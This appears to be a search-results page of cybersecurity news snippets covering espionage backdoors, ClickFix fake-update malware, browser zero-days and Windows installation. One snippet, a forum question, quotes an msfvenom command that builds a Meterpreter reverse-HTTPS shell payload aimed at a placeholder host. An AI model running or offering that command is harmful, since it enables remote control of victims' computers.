China-linked Evasive Panda used DNS poisoning to deliver the MgBot backdoor in targeted espionage attacks from 2022 to 2024.
The ClickFix campaign disguises malware as legitimate Windows updates, using steganography to hide shellcode in PNG files and bypass security detection systems.
Threat actors are using a twist on the ClickFix attack model, in this case hiding the malicious code they want victims to download in a convincing – but fake – Windows Update screen, complete with ...
The threat actor behind Operation ForumTroll used the same toolset typically employed in Dante spyware attacks. The exploitation of the first Chrome zero-day of 2025 is linked to tools used in attacks ...
Windows 11 might be the latest version of Windows, but if you still use Windows 10 and need to "clean install" the operating system, or install or upgrade to it for the first time on an older PC, ...
In this blogpost, ESET researchers provide an analysis of Spellbinder, a lateral movement tool for performing adversary-in-the-middle attacks, used by the China-aligned threat actor that we have named ...
How come there are no user-agent strings embedded in the shellcode when using this command: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 ...
ESET researchers discovered a previously unknown vulnerability in Mozilla products, exploited in the wild by Russia-aligned group RomCom. This is at least the second time that RomCom has been caught ...
DEF CON 31 – Bramwell Brizendine’s, Jacob Hince’s, Austin Babcock’s, Max Kersten’s ‘Game-Changing Advances In Windows Shellcode Analysis’ by Marc Handelman on November 22, 2023 ...
At least for now, though, it seems like this change will only apply to future Windows versions. We were able to activate a fresh Windows 11 Pro 22H2 install with a Windows 8 Pro product key as of this ...
Cybersecurity researchers have discovered a previously undocumented advanced backdoor dubbed Deadglyph employed by a threat actor known as Stealth Falcon as part of a cyber espionage campaign.
Some results have been hidden because they may be inaccessible to you
Show inaccessible results
Feedback